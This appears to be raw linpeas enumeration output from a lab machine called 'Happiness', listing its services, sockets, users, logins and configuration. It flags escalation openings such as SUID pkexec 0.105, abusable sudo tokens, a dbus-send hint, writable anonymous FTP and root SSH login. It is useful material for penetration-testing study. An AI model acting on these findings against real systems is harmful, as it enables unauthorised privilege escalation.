apache-htcacheclean.service            disabled enabled 
apache-htcacheclean@.service           disabled enabled
apache2@.service                       disabled enabled
console-getty.service                  disabled disabled
debug-shell.service                    disabled disabled
ifupdown-wait-online.service           disabled enabled
irc_bot.service                        disabled enabled
serial-getty@.service                  disabled enabled
systemd-boot-check-no-failures.service disabled disabled
systemd-network-generator.service      disabled disabled
systemd-networkd-wait-online.service   disabled disabled
systemd-networkd.service               disabled enabled
systemd-resolved.service               disabled enabled
systemd-time-wait-sync.service         disabled disabled
14 unit files listed.
══╣ Additional service files:
./linpeas.sh: 3944: local: /usr/sbin/apachectl: bad variable name
You can't write on systemd PATH
╔══════════╣ Systemd Information
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths 
═╣ Systemd version and vulnerabilities? .............. 247.3                                                    
═╣ Services running as root? ..... 
═╣ Running services with dangerous capabilities? ... 
═╣ Services with writable paths? . apache2.service: Uses relative path 'start' (from ExecStart=/usr/sbin/apachectl start)                                               
rsyslog.service: Uses relative path '-n' (from ExecStart=/usr/sbin/rsyslogd -n -iNONE)                          
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths 
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets                       
./linpeas.sh: 4207: local: /run/systemd/journal/stdout: bad variable name

╔══════════╣ Unix Sockets Analysis
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets                       
/run/dbus/system_bus_socket                             
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/fsck.progress
/run/systemd/inaccessible/sock
/run/systemd/io.system.ManagedOOM
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/journal/dev-log
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/journal/stdout
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/journal/syslog
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/systemd/notify
  └─(Read Write Execute (Weak Permissions: 777) )
  └─(Owned by root)
/run/systemd/private
  └─(Read Write Execute (Weak Permissions: 777) )
  └─(Owned by root)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write (Weak Permissions: 666) )
  └─(Owned by root)
/run/udev/control
/run/user/1000/bus
  └─(Read Write (Weak Permissions: 666) )
/run/user/1000/gnupg/S.dirmngr
  └─(Read Write )
/run/user/1000/gnupg/S.gpg-agent
  └─(Read Write )
/run/user/1000/gnupg/S.gpg-agent.browser
  └─(Read Write )
/run/user/1000/gnupg/S.gpg-agent.extra
  └─(Read Write )
/run/user/1000/gnupg/S.gpg-agent.ssh
  └─(Read Write )
/run/user/1000/pk-debconf-socket
  └─(Read Write (Weak Permissions: 666) )
/run/user/1000/systemd/inaccessible/sock
/run/user/1000/systemd/notify
  └─(Read Write Execute )
/run/user/1000/systemd/private
  └─(Read Write Execute )
╔══════════╣ D-Bus Analysis
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus                         
NAME                            PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                            278 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -
:1.1                              1 systemd         root             :1.1          init.scope                  -       -
:1.136                        24323 busctl          Eecho            :1.136        session-3.scope             3       -
:1.2                            336 systemd-logind  root             :1.2          systemd-logind.service      -       -
:1.3                            394 unattended-upgr root             :1.3          unattended-upgrades.service -       -
:1.6                          12507 systemd         Eecho            :1.6          user@1000.service           -       -
com.ubuntu.SoftwareProperties     - -               -                (activatable) -                           -       -
org.freedesktop.DBus              1 systemd         root             -             init.scope                  -       -
org.freedesktop.PackageKit        - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1        - -               -                (activatable) -                           -       -
org.freedesktop.hostname1         - -               -                (activatable) -                           -       -
org.freedesktop.locale1           - -               -                (activatable) -                           -       -
org.freedesktop.login1          336 systemd-logind  root             :1.2          systemd-logind.service      -       -
org.freedesktop.network1          - -               -                (activatable) -                           -       -
org.freedesktop.resolve1          - -               -                (activatable) -                           -       -
org.freedesktop.systemd1          1 systemd         root             :1.1          init.scope                  -       -
org.freedesktop.timedate1         - -               -                (activatable) -                           -       -
org.freedesktop.timesync1       278 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -
╔══════════╣ D-Bus Configuration Files
Analyzing /etc/dbus-1/system.d/com.ubuntu.SoftwareProperties.conf:
  └─(Allow rules in default context)
             └─     <allow send_destination="com.ubuntu.SoftwareProperties"
            <allow send_destination="com.ubuntu.SoftwareProperties"
            <allow send_destination="com.ubuntu.DeviceDriver"
Analyzing /etc/dbus-1/system.d/org.freedesktop.PackageKit.conf:
  └─(Allow rules in default context)
             └─     <allow send_destination="org.freedesktop.PackageKit"
            <allow send_destination="org.freedesktop.PackageKit"
            <allow send_destination="org.freedesktop.PackageKit"

══╣ D-Bus Session Bus Analysis
(Access to session bus available)                       
           string "org.freedesktop.DBus"
           string "org.freedesktop.systemd1"
           string ":1.0"
           string ":1.2"
  └─(Known dangerous session service: org.freedesktop.systemd1)                                                 
     └─ Try: dbus-send --session --dest=org.freedesktop.systemd1 / [Interface] [Method] [Arguments]
╔══════════╣ Legacy r-commands (rsh/rlogin/rexec) and host-based trust                                          
                                                        
══╣ Listening r-services (TCP 512-514)
                                                        
══╣ systemd units exposing r-services
rlogin|rsh|rexec units Not Found                        
                                                        
══╣ inetd/xinetd configuration for r-services
  No r-services found in /etc/inetd.conf                
/etc/xinetd.d Not Found                                                 
══╣ Installed r-service server packages
ii  inetutils-inetd               2:2.0-1+deb11u2                             amd64        internet super server
══╣ /etc/hosts.equiv and /etc/shosts.equiv
                                                        
══╣ Per-user .rhosts files
.rhosts Not Found                                                                                           
══╣ PAM rhosts authentication
/etc/pam.d/rlogin|rsh Not Found                                                                           
══╣ SSH HostbasedAuthentication
  HostbasedAuthentication no or not set                
══╣ Potential DNS control indicators (local)
  Not detected                                          

╔══════════╣ Crontab UI (root) misconfiguration checks
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs            
crontab-ui Not Found                                                                                           
                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════                             
                              ╚═════════════════════╝   
╔══════════╣ Interfaces
default         0.0.0.0                                 
loopback        127.0.0.0
link-local      169.254.0.0

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:bf:9e:c8 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.106/24 brd 192.168.0.255 scope global dynamic enp0s3
       valid_lft 6769sec preferred_lft 6769sec
    inet6 fe80::a00:27ff:febf:9ec8/64 scope link 
       valid_lft forever preferred_lft forever
╔══════════╣ Hostname, hosts and DNS
══╣ Hostname Information                                
System hostname: Happiness                              
FQDN: Happiness

══╣ Hosts File Information
Contents of /etc/hosts:                                 
  127.0.0.1     localhost
  127.0.1.1     PyCrt.PyCrt     PyCrt
  ::1     localhost ip6-localhost ip6-loopback
  ff02::1 ip6-allnodes
  ff02::2 ip6-allrouters
  127.0.0.1 Happiness
══╣ DNS Configuration
DNS Servers (resolv.conf):                              
  192.168.1.1
  192.168.0.1
-e 
Systemd-resolved configuration:
  [Resolve]
-e 
DNS Domain Information:
(none)
-e 
DNS Cache Status (systemd-resolve):
╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports                    
══╣ Active Ports (ss)                                   
tcp     LISTEN   0        32               0.0.0.0:21            0.0.0.0:*      
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:23            0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:37            0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:7             0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:9             0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:13            0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:19            0.0.0.0:*      
tcp     LISTEN   0        128                 [::]:22               [::]:*      
tcp     LISTEN   0        128                    *:80                  *:*      

╔══════════╣ Network Traffic Analysis Capabilities
                                                        
══╣ Available Sniffing Tools
No sniffing tools found                                 

══╣ Network Interfaces Sniffing Capabilities
Interface enp0s3: Not sniffable                         
No sniffable interfaces found

╔══════════╣ Firewall Rules Analysis
                                                        
══╣ Iptables Rules
No permission to list iptables rules                    

══╣ Nftables Rules
nftables Not Found                                      
                                                        
══╣ Firewalld Rules
firewalld Not Found                                     
                                                        
══╣ UFW Rules
ufw Not Found                                           
                                                        
╔══════════╣ Inetd/Xinetd Services Analysis
                                                        
══╣ Inetd Services
inetd Not Found                                                                                        
══╣ Xinetd Services
xinetd Not Found                                        
                                                        
══╣ Running Inetd/Xinetd Services
-e                                                      
Active Services (from ss):
-e 
Running Service Processes:
361
inetutils-inetd

╔══════════╣ Internet Access?
DNS accessible                                          
ICMP is accessible
Port 443 is accessible
Port 80 is accessible
Port 443 is not accessible with wget



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════                             
                               ╚═══════════════════╝    
╔══════════╣ My user
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users                         
uid=1000(Eecho) gid=1000(Eecho) groups=1000(Eecho)      

╔══════════╣ PGP Keys and Related Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys                      
GPG:                                                    
GPG is installed, listing keys:
-e 
NetPGP:
netpgpkeys Not Found
-e                                                      
PGP Related Files:
Found: /home/Eecho/.gnupg
total 16
drwx------ 2 Eecho Eecho 4096 Jan 24 02:22 .
drwxr-xr-x 3 Eecho Eecho 4096 Jan 24 02:22 ..
-rw------- 1 Eecho Eecho   32 Jan 24 02:22 pubring.kbx
-rw------- 1 Eecho Eecho 1200 Jan 24 02:22 trustdb.gpg

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d                                               
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid                 
                                                        

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens           
ptrace protection is disabled (0), so sudo tokens could be abused

doas.conf Not Found
                                                        
╔══════════╣ Checking Pkexec and Polkit
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2                                             
                                                        
══╣ Polkit Binary
Pkexec binary found at: /usr/bin/pkexec                 
Pkexec binary has SUID bit set!
-rwsr-xr-x 1 root root 23448 Jan 13  2022 /usr/bin/pkexec
pkexec version 0.105

══╣ Polkit Policies
Checking /etc/polkit-1/localauthority.conf.d/:          

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo
Checking /usr/share/polkit-1/rules.d/:
polkit.addRule(function(action, subject) {
    if ((action.id == "org.freedesktop.packagekit.upgrade-system" ||
         action.id == "org.freedesktop.packagekit.trigger-offline-update") &&
        subject.active == true && subject.local == true &&
        subject.isInGroup("sudo")) {
            return polkit.Result.YES;
    }
});
// Allow systemd-networkd to set timezone, get product UUID,
// and transient hostname
polkit.addRule(function(action, subject) {
    if ((action.id == "org.freedesktop.hostname1.set-hostname" ||
         action.id == "org.freedesktop.hostname1.get-product-uuid" ||
         action.id == "org.freedesktop.timedate1.set-timezone") &&
        subject.user == "systemd-network") {
        return polkit.Result.YES;
    }
});

══╣ Polkit Authentication Agent
                                                        
╔══════════╣ Superusers and UID 0 Users
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html   
                                                        
══╣ Users with UID 0 in /etc/passwd
root:x:0:0:root:/root:/bin/bash                         

══╣ Users with sudo privileges in sudoers
                                                        
╔══════════╣ Users with console
Eecho:x:1000:1000::/home/Eecho:/bin/bash                
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                  
uid=1000(Eecho) gid=1000(Eecho) groups=1000(Eecho)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)                                                  
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(ftp) gid=113(ftp) groups=113(ftp)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)                                                      
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Currently Logged in Users
                                                        
══╣ Basic user information
 02:22:30 up 55 min,  2 users,  load average: 0.30, 0.09, 1.28
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
Eecho    pts/0    192.168.0.108    02:12    3:26   0.09s  0.00s w
Eecho    pts/1    192.168.0.108    02:14    1:24   0.00s  0.00s -bash

══╣ Active sessions
 02:22:30 up 55 min,  2 users,  load average: 0.30, 0.09, 1.28
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
Eecho    pts/0    192.168.0.108    02:12    3:26   0.09s  0.00s w
Eecho    pts/1    192.168.0.108    02:14    1:24   0.00s  0.00s -bash

══╣ Logged in users (utmp)
           system boot  2026-01-24 01:26                
           run-level 5  2026-01-24 01:26
LOGIN      tty1         2026-01-24 01:26               367 id=tty1
Eecho    + pts/0        2026-01-24 02:12 00:03       12504 (192.168.0.108)
Eecho    + pts/1        2026-01-24 02:14 00:01       12547 (192.168.0.108)

══╣ SSH sessions
ESTAB      0      0                192.168.0.106:22               192.168.0.108:36408                                                                           
ESTAB      0      0                192.168.0.106:22               192.168.0.108:39356                                                                           

══╣ Screen sessions
                                                        
══╣ Tmux sessions
                                                        
╔══════════╣ Last Logons and Login History
                                                        
══╣ Last logins
Eecho    pts/1        192.168.0.108    Sat Jan 24 02:14   still logged in
Eecho    pts/0        192.168.0.108    Sat Jan 24 02:12   still logged in
reboot   system boot  4.19.0-27-amd64  Sat Jan 24 01:26   still running
root     pts/0        192.168.1.12     Thu Jan 22 23:44 - crash (1+01:42)
root     pts/0        192.168.1.12     Thu Jan 22 23:42 - 23:43  (00:01)
reboot   system boot  4.19.0-27-amd64  Thu Jan 22 23:41   still running
root     pts/0        192.168.1.8      Thu Jan 22 13:49 - crash  (09:52)
reboot   system boot  4.19.0-27-amd64  Thu Jan 22 13:48   still running
root     pts/0        192.168.1.8      Thu Jan 22 13:29 - crash  (00:18)
reboot   system boot  4.19.0-27-amd64  Thu Jan 22 13:28   still running
root     pts/0        192.168.1.8      Thu Jan 22 13:05 - 13:05  (00:00)
root     pts/0        192.168.1.8      Thu Jan 22 10:41 - 13:05  (02:24)
reboot   system boot  4.19.0-27-amd64  Thu Jan 22 10:40   still running
welcome  pts/0        192.168.3.94     Fri Apr 11 22:27 - 22:28  (00:00)
root     pts/0        192.168.3.94     Fri Apr 11 22:27 - 22:27  (00:00)
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:26   still running
root     pts/0        192.168.3.94     Fri Apr 11 22:23 - 22:25  (00:01)
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:23 - 22:25  (00:02)
root     pts/0        192.168.3.94     Fri Apr 11 22:15 - 22:22  (00:07)
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:14 - 22:22  (00:08)

wtmp begins Tue Mar 18 20:40:32 2025

══╣ Failed login attempts
                                                        
══╣ Recent logins from auth.log (limit 20)
                                                        
══╣ Last time logon each user
Username         Port     From             Latest       
root             pts/0    192.168.1.12     Thu Jan 22 23:44:10 -0500 2026
Eecho            pts/1    192.168.0.108    Sat Jan 24 02:14:41 -0500 2026

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)                 
                                                        
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!      
                                                        


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════                              
                             ╚══════════════════════╝   
╔══════════╣ Useful software
/usr/bin/base64                                         
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/ruby
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  g++                           4:10.2.1-1                                  amd64        GNU C++ compiler
ii  g++-10                        10.2.1-6                                    amd64        GNU C++ compiler
ii  gcc                           4:10.2.1-1                                  amd64        GNU C compiler
ii  gcc-10                        10.2.1-6                                    amd64        GNU C compiler
/usr/bin/gcc

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.62 (Debian)  
Server built:   2024-08-15T01:18:37
httpd Not Found
                                                        
Nginx version: nginx Not Found
                                                        
/etc/apache2/mods-enabled/php8.3.conf-<FilesMatch ".+\.ph(?:ar|p|tml)$">
/etc/apache2/mods-enabled/php8.3.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php8.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php8.3.conf:    SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-available/php8.3.conf-<FilesMatch ".+\.ph(?:ar|p|tml)$">
/etc/apache2/mods-available/php8.3.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php8.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php8.3.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jan 22 12:12 /etc/apache2/sites-enabled                                             
drwxr-xr-x 2 root root 4096 Jan 22 12:12 /etc/apache2/sites-enabled                                             
lrwxrwxrwx 1 root root 31 Jan 22 12:11 /etc/apache2/sites-enabled/tmpfile.conf -> ../sites-available/tmpfile.conf                                                       
<VirtualHost *:80>
    ServerName tmpfile.dsz
    DocumentRoot /var/www/html
    <Directory /var/www/html>
        Options Indexes FollowSymLinks
        AllowOverride All
        Require all granted
    </Directory>
    ErrorLog ${APACHE_LOG_DIR}/tmpfile_error.log
    CustomLog ${APACHE_LOG_DIR}/tmpfile_access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 33 Jan 22 12:11 /etc/apache2/sites-enabled/localhost.conf -> ../sites-available/localhost.conf                                                   
<VirtualHost *:80>
    ServerName localhost
    DocumentRoot /var/www/localhost
    ErrorLog ${APACHE_LOG_DIR}/localhost_error.log
    CustomLog ${APACHE_LOG_DIR}/localhost_access.log combined
</VirtualHost>


-rw-r--r-- 1 root root 1332 Aug 14  2024 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

-rw-r--r-- 1 root root 73769 Jan 22 11:54 /etc/php/8.3/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 73714 Mar 13  2025 /etc/php/8.3/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On



╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 1126 Nov 30  2023 /etc/mysql/mariadb.cnf                                                 
[client-server]
socket = /run/mysqld/mysqld.sock
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/


╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jan 22 12:17 /etc/pam.d     
-rw-r--r-- 1 root root 2133 Dec 21  2023 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'    
drwxr-xr-x 2 root root 4096 Mar 31  2025 /etc/ldap


╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Mar 18  2025 /usr/share/keyrings                                                    




╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 6137 Jan 22 13:49 /etc/vsftpd.conf                                                       
anonymous_enable=YES
no_anon_password=YES
anon_root=/var/ftp/pub
local_enable=YES
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
local_enable=YES
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
-rw-r--r-- 1 root root 41 Jun 18  2015 /usr/lib/tmpfiles.d/vsftpd.conf
-rw-r--r-- 1 root root 564 Aug  6  2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 506 Aug  6  2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 260 Feb  1  2008 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf
anonymous_enable
local_enable=YES
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 69 Mar 13  2025 /etc/php/8.3/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Mar 13  2025 /usr/share/php8.3-common/common/ftp.ini
╔══════════╣ Analyzing Other Interesting Files (limit 70)                                                       
-rw-r--r-- 1 root root 3526 Apr 18  2019 /etc/skel/.bashrc                                                      
-rw-r--r-- 1 Eecho Eecho 3526 Apr 18  2019 /home/Eecho/.bashrc                                                  
-rw-r--r-- 1 root root 807 Apr 18  2019 /etc/skel/.profile                                                      
-rw-r--r-- 1 Eecho Eecho 807 Apr 18  2019 /home/Eecho/.profile                                                  
╔══════════╣ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 22 Mar 31  2025 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
lrwxrwxrwx 1 root root 24 Mar 31  2025 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 83 Mar 31  2025 /var/lib/dpkg/alternatives/my.cnf
╔══════════╣ Searching mysql credentials and exec
Found readable /etc/mysql/my.cnf                        
[client-server]
socket = /run/mysqld/mysqld.sock
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

MySQL process not found.
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg                                            
netpgpkeys Not Found
netpgp Not Found                                                                                           
-rw-r--r-- 1 root root 8700 Jun 22  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-automatic.gpg
-rw-r--r-- 1 root root 8709 Jun 22  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-security-automatic.gpg
-rw-r--r-- 1 root root 280 Jun 22  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-stable.gpg
-rw-r--r-- 1 root root 8700 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-security-automatic.gpg
-rw-r--r-- 1 root root 2453 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 7443 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
-rw-r--r-- 1 root root 0 Apr  1  2025 /etc/apt/trusted.gpg.d/ondrej_ubuntu_php.gpg
-rw-r--r-- 1 root root 1769 Apr  1  2025 /etc/apt/trusted.gpg.d/php.gpg
-rw-r--r-- 1 root root 2899 Jul  1  2022 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 8700 Jun 22  2023 /usr/share/keyrings/debian-archive-bookworm-automatic.gpg
-rw-r--r-- 1 root root 8709 Jun 22  2023 /usr/share/keyrings/debian-archive-bookworm-security-automatic.gpg
-rw-r--r-- 1 root root 280 Jun 22  2023 /usr/share/keyrings/debian-archive-bookworm-stable.gpg
-rw-r--r-- 1 root root 8700 Jun 22  2023 /usr/share/keyrings/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Jun 22  2023 /usr/share/keyrings/debian-archive-bullseye-security-automatic.gpg
-rw-r--r-- 1 root root 2453 Jun 22  2023 /usr/share/keyrings/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Jun 22  2023 /usr/share/keyrings/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Jun 22  2023 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Jun 22  2023 /usr/share/keyrings/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 73314 Jun 22  2023 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 36873 Jun 22  2023 /usr/share/keyrings/debian-archive-removed-keys.gpg
-rw-r--r-- 1 root root 7443 Jun 22  2023 /usr/share/keyrings/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Jun 22  2023 /usr/share/keyrings/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Jun 22  2023 /usr/share/keyrings/debian-archive-stretch-stable.gpg
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd                          
passwd file: /etc/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)             
-rw-r--r-- 1 root root 172 Mar 18  2025 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 92 Mar 18  2025 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 564 Mar 18  2025 /etc/ssh/ssh_host_rsa_key.pub
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/ssl/certs/ACCVRAIZ1.pem                            
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
